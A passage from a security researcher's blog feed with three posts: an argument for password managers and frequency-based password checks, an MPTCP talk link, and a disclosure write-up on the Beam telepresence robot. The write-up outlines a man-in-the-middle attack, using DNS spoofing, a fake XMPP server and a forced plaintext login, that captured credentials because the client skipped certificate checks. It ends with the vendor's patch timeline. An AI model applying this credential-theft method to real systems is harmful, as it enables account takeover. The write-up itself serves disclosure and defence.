<p><img src="https://blog.diogomonica.com/content/images/2016/08/xkcd_comic.png" alt loading="lazy"></p>
<p>There are obviously a few situations where memorable passwords are a requirement, but if you write an <a href="http://www.vice.com/read/your-password-is-not-secure-and-its-not-your-fault-102?ref=blog.diogomonica.com" title="Vice your password is not secure">article</a> about choosing passwords where password managers aren&apos;t mentioned even once, you&apos;re not helping anyone.</p>
<p>In this post I&#x2019;m going to make the following arguments:</p>
<ul>
<li>Choosing a password should be something you do very infrequently.</li>
<li>Our focus should be on protecting passwords against informed statistical attacks and not brute-force attacks.</li>
<li>When you do have to choose a password, one of the most important selection criterion should be how many other people have also chosen that same password.</li>
<li>One of the most impactful things that we can do as a security community is to change password strength meters and disallow the use of common passwords.</li>
</ul>
<h2 id="usersshouldnotbechoosingpasswords">Users should not be choosing passwords</h2>
<p>Every time someone writes about the topic of passwords the XKCD comic shown above up makes an appearance.</p>
<p>The fact is that the number of passwords you should memorize is pretty small, and there is no need of teaching users how to choose good passwords. Everyone knows what a good password looks like, we just can&apos;t memorize unique, strong passwords, for every single on-line service out there.</p>
<p>With the advent of password managers, the large majority of all passwords should just be randomly generated, and replaced with a single password that provides access to all the others. This solves both the strength and memorability problems for 95% of your passwords<sup><a id="ffn1" href="#fn1" class="footnote">1</a></sup>.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/password_pie.png" alt loading="lazy"></p>
<p>The obvious exceptions to this rule are: the password manager&apos;s own vault key, laptop passwords, phone unlock codes, etc. Note, however, that this number of passwords is mostly static; it does not increase when you sign up for a new service.</p>
<p>Even if we entertained the XKCD comic and started training users to select four random words instead of a complex single-word password, I argue that it would not amount to a significant increase in security.</p>
<p>People are not very creative and tend to think the same way when choosing passwords. This would lead to the exact same problem we have now, where a few passwords such as &quot;password123&quot; become very common. What is there to prevent &#x201C;letmeinfacebook&#x201D; from being the new most common four word password for Facebook accounts?<sup><a id="ffn2" href="#fn2" class="footnote">2</a></sup></p>
<h2 id="theattackermodeliswrong">The Attacker Model is wrong</h2>
<p>Bruteforcing passwords these days is hard. As a community we did a great job incentivizing the use of <a href="http://en.wikipedia.org/wiki/Bcrypt?ref=blog.diogomonica.com">bcrypt</a> and <a href="http://en.wikipedia.org/wiki/Scrypt?ref=blog.diogomonica.com">scrypt</a>, and humiliating those who use <a href="http://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/?ref=blog.diogomonica.com">bad password hashing mechanisms</a>.</p>
<p>Unless your attacker model includes state actors, you really don&#x2019;t have to be concerned about pure brute-force attacks. The most efficient attack against scrypt involves the compromise of your password hash and a lot of money spent on dedicated hardware to crack it offline, something the large majority of attackers does not have access to.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/nsa_eagle.jpg" alt loading="lazy"></p>
<p>Without stealing the password hash, attackers are limited to trying username/password combinations over the internet, reducing the upper-bound of number of attempts per second by at least 3 orders of magnitude.</p>
<p>This means that we should stop blindly classifying password strength based on the number of bits of entropy<sup><a id="ffn3" href="#fn3" class="footnote">3</a></sup>, and should consider first and foremost how dictionary-attack resistant the passwords is.</p>
<h2 id="abetterpasswordvalidationcriterion">A better password validation criterion</h2>
<p>Password validation heuristic rules, (e.g. minimum length, forceful use of alphanumeric characters, etc) are largely ineffective and are often counterproductive.</p>
<p>These heuristics are inadvertently leading users to the repeated use of very common solutions, which can be easily remembered, while still obeying the requirements. In fact, users typically circumvent the imposed pseudo-randomness by using a few common tricks (&quot;p@ssw0rd&quot; being a typical example), which are then used repeatedly.</p>
<p>This leads to the repeated use of what are, in fact, very weak passwords, highly vulnerable to statistical guessing attacks (a dictionary based attack ordered by decreasing probability of occurrence).</p>
<p>When coupled with the predominance of dictionary based attacks and leaks of large password data sets, this situation has led, in later years, to the idea that the single most useful criterion on which to classify the strength of a candidate password, is the frequency with which it has appeared in the past.</p>
<table>
        <tbody><tr>
            <td>
                <img width="400" src="https://blog.diogomonica.com/content/images/2016/08/distribution1.png">
              </td>
            <td>       
                <img width="400" src="https://blog.diogomonica.com/content/images/2016/08/distribution2.png">
             </td>
        </tr>
    </tbody>
</table>
<p>This means that instead of a password strength meter you should be ensuring that there is no skew in the distribution of passwords. If each password is guaranteed to be unique, the advantage of a statistical guessing attack is greatly reduced.</p>
<p>There are <a href="https://www.usenix.org/conference/hotsec10/popularity-everything-new-approach-protecting-passwords-statistical-guessing?ref=blog.diogomonica.com">several</a> <a href="http://www.internetsociety.org/adaptive-password-strength-meters-markov-models?ref=blog.diogomonica.com">works</a> in the literature that propose such schemes, including one of <a href="https://github.com/diogomonica/diogomonica.com/blob/master/media/password-security-why-the-horse-battery-staple-is-not-correct/local_password_validation_with_soms_diogo_monica.pdf?ref=blog.diogomonica.com">my own</a> (PDF).</p>
<div style="text-align: center;">
<iframe src="//www.slideshare.net/slideshow/embed_code/38823827" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe>
</div>
<h2 id="whatweshoulddo">What we should do</h2>
<p>I think the first step is to stop propagating the idea that there is a way of choosing memorizable passwords that will keep attackers at bay. This means no more &#x201C;How to choose your password&#x201D; blogposts.</p>
<p>The second step is to start using the password strength forms to promote better password hygiene. I have seen a lot of <a href="http://www.badpasswords.org/?ref=blog.diogomonica.com">stupid password strength forms</a>, but I have never seen one that tells the user generate and store the password in a password manager.</p>
<p>Finally, we should be evaluating the strength of passwords based on the frequency of appearance of those passwords, and not merely based on heuristics and misguided entropy calculations.</p>
<h2 id="ultimatelypasswordsshoulddie">Ultimately, Passwords should die</h2>
<p>As a longer term strategy, we are moving to kill the use of passwords as the single authentication mechanism, and enforcing multi-factor authentication as the default everywhere.</p>
<p>For the time being, we should focus some of our efforts on providing passwords the essential Basic life support they need.</p>
<h2 id="conclusion">Conclusion</h2>
<ul>
<li>Users don&#x2019;t need password memorization schemes, they need to be incentivized to use a good password manager.</li>
<li>For the few passwords they do need to memorize, you should focus on making them dictionary-attack resistant, not just strong from an information theory perspective.</li>
</ul>
<ol id="footnotes">
  <li id="fn1">Not derived from real data. <a href="#ffn1">&#x21A9;</a></li>
  <li id="fn2">If you analyze any of the large password leaks of the last few years you will notice that people tend to use the name of the service as part of their passwords. <a href="#ffn2">&#x21A9;</a></li>
  <li id="fn3">Obviously a decent minimum number of characters should still be enforced.<a href="#ffn3">&#x21A9;</a></li>
</ol>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[MPTCP: The path to multipath]]></title><description><![CDATA[I first heard about MultiPath TCP (MPTCP) in 2007 when I met Olivier Bonaventure in Louvain-la-Neuve, Belgium. In the meantime MPTCP has been gaining a ton of traction...]]></description><link>https://blog.diogomonica.com/2014/05/08/mptcp-the-path-to-multipath/</link><guid isPermaLink="false">62d8ce7b47f91800018f06c9</guid><category><![CDATA[mptcp]]></category><category><![CDATA[tcp]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Thu, 08 May 2014 21:28:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>I first heard about MultiPath TCP (MPTCP) in 2007 when I met <a href="http://perso.uclouvain.be/olivier.bonaventure/blog/html/index.html?ref=blog.diogomonica.com">Olivier Bonaventure</a> in Louvain-la-Neuve, Belgium.</p>
<p>In the meantime MPTCP has been gaining a ton of traction, from having Apple using it for Siri on <a href="http://www.networkworld.com/news/2013/091913-ios7-multipath-273995.html?ref=blog.diogomonica.com">iOS</a> to large loadbalancer vendors like F5 <a href="https://devcentral.f5.com/questions/is-mptcp-supported?ref=blog.diogomonica.com">supporting it</a> and even large-scale media <a href="http://arstechnica.com/apple/2013/09/multipath-tcp-lets-siri-seamlessly-switch-between-wi-fi-and-3glte/?ref=blog.diogomonica.com">covering it&apos;s advantages</a>.</p>
<p>If you want a primer on MPTCP you should check out the suprisingly readable <a href="http://tools.ietf.org/html/rfc6824?ref=blog.diogomonica.com">RFC</a>, or even <a href="http://queue.acm.org/detail.cfm?id=2591369&amp;ref=blog.diogomonica.com">this article</a> by Olivier Bonaventure. There is also a ton of information on the Linux Kernel MultiPath TCP project <a href="http://www.multipath-tcp.org/?ref=blog.diogomonica.com">multipath-tcp.org</a>.</p>
<p>Anyway, the point of this post is to share a Security oriented presentation that I did on a MPTCP a while back. Enjoy.</p>
<h2 id="thepresentation">The presentation</h2>
<iframe src="https://www.slideshare.net/slideshow/embed_code/34457245" width="597" height="486" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px 1px 0; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Skynet (beta): The rise of the Beam robot]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_robot.jpg" alt loading="lazy"></p>
<p>At work we bought a few telepresence robots from <a href="https://suitabletech.com/?ref=blog.diogomonica.com">SuitableTech</a> called Beam. The Beam robots allow anyone from a remote location to have face-to-face interaction with the people at our HQ.</p>
<p>Each Beam robot boasts two wide-angle HD cameras, a 6-microphone array that cancels echo and reduces background noise, a</p>]]></description><link>https://blog.diogomonica.com/2013/11/03/skynet-beta-the-rise-of-the-beam-robot/</link><guid isPermaLink="false">62d8ce7b47f91800018f06ca</guid><category><![CDATA[beam]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sun, 03 Nov 2013 21:31:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_robot.jpg" alt loading="lazy"></p>
<p>At work we bought a few telepresence robots from <a href="https://suitabletech.com/?ref=blog.diogomonica.com">SuitableTech</a> called Beam. The Beam robots allow anyone from a remote location to have face-to-face interaction with the people at our HQ.</p>
<p>Each Beam robot boasts two wide-angle HD cameras, a 6-microphone array that cancels echo and reduces background noise, a 17&quot; screen, and a built-in speaker. It has a top speed of 3mph, and the battery lasts for 8 hours of active use.</p>
<p>The first thing that I thought when I used them the first time was how amazing the video/sounds quality was. The second was, <ux class="highlight"><b>can I hack it?</b></ux></p>
<p><ux class="highlight">TL;DR:</ux> The beam client application didn&apos;t validate the remote server&apos;s certificate leading to the ability of an attacker stealing credentials by using a MITM attack. <a href="https://gist.github.com/diogomonica/a24a7285f31804d37144?ref=blog.diogomonica.com">Get the PoC code here</a>.</p>
<h2 id="theperfecttrojanhorse">The perfect trojan-horse</h2>
<p>What could be better than having an employee as an insider at a company? Having an insider robot, of course. Particularly one that has 2 HD cameras, a microphone and wheels to stroll around the office at 3am.</p>
<p>Each Beam is tied to an organization. To be able to control a Beam robot you have to use SuitableTech&apos;s client application and have been invited by the administrator the organization. You also have to create an account at suitabletech.com and use those credentials to login to the client app.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_diagram.png" alt loading="lazy"></p>
<h2 id="theclientapplication">The client application</h2>
<p>There were several different ways of trying to take control of the beams. I started by trying to understand how the beams were receiving the commands from the client application. It turns out, I didn&apos;t really have to go any further than that.</p>
<p>This is what the client application looks like:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_login.png" alt loading="lazy"></p>
<p>By providing correct credentials you are then able to select one of the Beam robots available and start the remote control session.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_control.png" alt loading="lazy"></p>
<p>Inspecting the network communication using wireshark, it becomes obvious that the authentication is being done via a TLS-encrypted XMPP connection.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_tls_hello.png" alt loading="lazy"></p>
<p>The application communicates with two different remote-servers: xmpp.suitabletech.com and suitabletech.com. Initially, several plain-text XMPP messages are exchanged, but then the client sends a STARTTLS connection and after the TLS negotiation all data is sent encrypted. This seems like a solid design.</p>
<p>I ran the Beam application directly from the command-line and I got some very useful debugging information. Of particular relevance was this warning line:</p>
<pre><code class="language-bash">WRN 17:36:28 talk/base/openssladapter.cc:867 Ignoring cert error while verifying cert chain
</code></pre>
<p>Ok, that seems bad. Let&apos;s see what google has to tell me in terms of where this error originates. I quickly find lines <b>851-855 of libjingle&apos;s openssladapter.cc</b>:</p>
<pre><code class="language-C">// Should only be used for debugging and development.
if (!ok &amp;&amp; stream-&gt;ignore_bad_cert()) {
  LOG(LS_WARNING) &lt;&lt; &quot;Ignoring cert error while verifying cert chain&quot;;
  ok = 1;
}
</code></pre>
<p>Wow. It seems that the Beam client application by default comes configured in debug mode and therefore it <ux class="highlight"><b>ignores the remote certificate validation</b></ux>. Neat.</p>
<p>With this in mind, I set out to understand how the XMPP protocol works, and exactly what a XMPP client expects of the server. By creating a simple Java application that proxies every connection that passes through it, printing out the messages from the client and the servers, and a little bit of DNS spoofing I was able to understand exactly what the Beam application and the Suitable Tech&#x2019;s servers were exchanging right until the TLS tunnel is setup.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_message_exchange.png" alt loading="lazy"></p>
<p>It turns out that the XMPP protocol supports dropping the authentication mechanism to plaintext, so I generated a new self-signed certificate for suitabletech.com and wrote a python script that emulates the <a href="https://gist.github.com/diogomonica/a24a7285f31804d37144?ref=blog.diogomonica.com">server-side XMPP communication</a>, conveniently asking the client to authenticate via the PLAIN mechanism.</p>
<p>I guess it&apos;s time to <b>steal some passwords</b> :).</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_mitm_1.png" alt loading="lazy"></p>
<p>As expected, and from what we were able to infer from the warning message on the console, the client is blindly accepting any certificate, happily providing the plain-text user&#x2019;s credentials to our fake server.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_mitm_2.png" alt loading="lazy"></p>
<h2 id="disclosuretimeline">Disclosure Timeline</h2>
<p>The team at SuitableTech seems to be really awesome, and they were super quick to both confirm the vulnerability and to patch it.</p>
<ul>
<li>
<p>June 16th: Vulnerability Discovered</p>
</li>
<li>
<p>June 18th: Initial Report finished</p>
</li>
<li>
<p>June 18th: Report sent to SuitableTech</p>
</li>
<li>
<p>June 18th: Vulnerability Confirmed by SuitableTech</p>
</li>
<li>
<p>June 20th: New version of the Beam app (1.17.1) is published and email gets sent out to all Beam admins to update.</p>
</li>
</ul>
<h2 id="conclusionsandfuturework">Conclusions and Future work</h2>
<p>I had a lot of fun playing with the Beams. It turned out that compromising credentials from the client application was surprisingly easy, allowing arbitrary Beam control to any attacker capable of a MITM attack during login. In this particular case, the most damaging atack would be to cruise around the remote office and maybe steal a few secrets, but what if the Beam&apos;s had <a href="https://www.youtube.com/watch?v=Q5BAnPeXYTI&amp;ref=blog.diogomonica.com">laser beams attached to their heads</a>?</p>
<p>I still intend to try attack the Beams directly and see if I can get anything there, but as I mentioned before, the conceptual security model for the Beams seems to be pretty solid and I doubt I&apos;m going to be able to find any other trivial issues like this.</p>
<p>This said, you never know ;).</p>
<!--kg-card-end: markdown-->]]></content:encoded></item></channel></rss>